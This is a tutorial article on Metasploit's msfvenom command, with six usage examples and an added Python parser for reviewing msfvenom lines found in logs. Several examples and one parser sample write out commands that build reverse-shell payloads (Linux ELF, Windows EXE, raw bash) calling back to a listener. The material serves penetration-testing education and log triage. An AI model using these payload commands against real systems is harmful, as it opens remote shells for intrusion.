How to use the command "msfvenom" (with examples)
The msfvenom command is a powerful tool included in the Metasploit Framework. It allows for the generation of various types of payloads for use with Metasploit, including creating binaries for different operating systems and architectures.
In this article, we will explore five different use cases of msfvenom with code examples. Each use case will be accompanied by a motivation for using it, an explanation of the arguments used, and an example output.
1: List payloads
msfvenom -l payloads
Motivation: This command provides a comprehensive list of all available payloads that can be used with Metasploit. It is useful in understanding the different options and capabilities of Metasploit.
Explanation: The -l flag is used to list payloads supported by msfvenom.
Example output:
Payloads
========
...
linux/x86/custom
php/meterpreter/reverse_tcp
windows/x64/meterpreter_reverse_http
...
2: List formats
msfvenom -l formats
Motivation: This command provides a list of all available output formats for payloads generated by msfvenom. It helps in determining the appropriate format for the desired use case.
Explanation: The -l flag is used to list available formats supported by msfvenom.
Example output:
Formats
=======
asp
aspx
asp_dll
bash
c
csharp
...
3: Show payload options
msfvenom -p payload --list-options
Motivation: This command reveals the various options and parameters that can be configured for a specific payload. It assists in customizing the payload to suit specific requirements.
Explanation: The -p flag specifies the payload to use, and the --list-options flag tells msfvenom to show the available options for that payload.
Example output:
...
LHOST yes The listen address (an interface may be specified)
LPORT 4444 The listen port
...
4: Create an ELF binary with a reverse TCP handler
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port -f elf -o path/to/binary
Motivation: This command generates an executable file in ELF format for the Linux x64 architecture that establishes a reverse TCP connection to a specified IP address and port. It is useful for creating payloads to exploit Linux systems.
Explanation: The -p flag specifies the payload to use, which in this case is linux/x64/meterpreter/reverse_tcp. The LHOST and LPORT options are used to specify the listener IP address and port respectively. The -f flag specifies the output format as ELF. The -o option is used to define the output path and filename.
Example output: A new ELF binary file is created at the specified path.
5: Create an EXE binary with a reverse TCP handler
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port -f exe -o path/to/binary.exe
Motivation: This command generates an executable file in EXE format for the Windows x64 architecture that establishes a reverse TCP connection to a specified IP address and port. It can be used for payload creation targeting Windows systems.
Explanation: The -p flag specifies the payload to use, which in this case is windows/x64/meterpreter/reverse_tcp. The LHOST and LPORT options are used to specify the listener IP address and port respectively. The -f flag specifies the output format as EXE. The -o option is used to define the output path and filename.
Example output: A new EXE binary file is created at the specified path.
6: Create a raw bash payload with a reverse TCP handler
msfvenom -p cmd/unix/reverse_bash LHOST=local_ip LPORT=local_port -f raw
Motivation: This command generates a raw bash payload that establishes a reverse TCP connection to a specified IP address and port. It is useful for creating simple payloads for Unix-based systems.
Explanation: The -p flag specifies the payload to use, which in this case is cmd/unix/reverse_bash. The LHOST and LPORT options are used to specify the listener IP address and port respectively. The -f flag specifies the output format as raw.
Example output: The raw payload is displayed in the terminal.
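The argument layout explained in use cases 1 to 6 (-l, -p, -f, -o and NAME=value options such as LHOST and LPORT) is also what a reviewer sees when msfvenom shows up in shell history or process audit logs. The following is an added example, not part of the original article or of Metasploit: a small parser that splits a logged command line into those fields for engagement records or triage. The function names and the sample lines are assumptions made for illustration.

```python
import shlex

# Flags shown in this article that take a value, mapped to a field name.
VALUE_FLAGS = {"-p": "payload", "-f": "format", "-o": "output", "-l": "list"}

def parse_msfvenom(cmdline):
    """Split a logged command line into msfvenom fields; None if not msfvenom."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a truncated log line
        tokens = cmdline.split()
    # The binary may be logged with a full path or behind a wrapper such as sudo.
    start = next((i for i, t in enumerate(tokens)
                  if t.rsplit("/", 1)[-1] == "msfvenom"), None)
    if start is None:
        return None
    rec = {"payload": None, "format": None, "output": None,
           "list": None, "options": {}, "flags": []}
    args, i = tokens[start + 1:], 0
    while i < len(args):
        tok = args[i]
        if tok in VALUE_FLAGS and i + 1 < len(args):
            rec[VALUE_FLAGS[tok]] = args[i + 1]
            i += 1                          # skip the value just consumed
        elif tok.startswith("-"):
            rec["flags"].append(tok)        # e.g. --list-options
        elif "=" in tok:
            key, value = tok.split("=", 1)  # NAME=value payload option
            rec["options"][key] = value
        i += 1
    return rec

def review(cmdline):
    """Triage summary: did the command build a payload, and where does it call back?"""
    rec = parse_msfvenom(cmdline)
    if rec is None:
        return None
    built = rec["payload"] is not None and "--list-options" not in rec["flags"]
    return {"generates_payload": built,
            "payload": rec["payload"],
            "callback": (rec["options"].get("LHOST"), rec["options"].get("LPORT")),
            "format": rec["format"],
            "written_to": rec["output"]}    # None: payload went to stdout

# Constructed sample lines (192.0.2.10 is a documentation-only address).
SAMPLES = ["msfvenom -l payloads",
           "sudo msfvenom -p cmd/unix/reverse_bash LHOST=192.0.2.10 LPORT=4444 -f raw"]

if __name__ == "__main__":
    for line in SAMPLES:
        print(review(line))
```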
Conclusion
In this article, we explored different use cases of the msfvenom command. We covered listing payloads and formats, showing payload options, and generating different types of payloads for Linux, Windows, and Unix systems.
msfvenom provides a powerful and flexible way to create payloads for use with Metasploit. By understanding its capabilities and options, security professionals can effectively leverage this tool to perform penetration testing and develop exploits.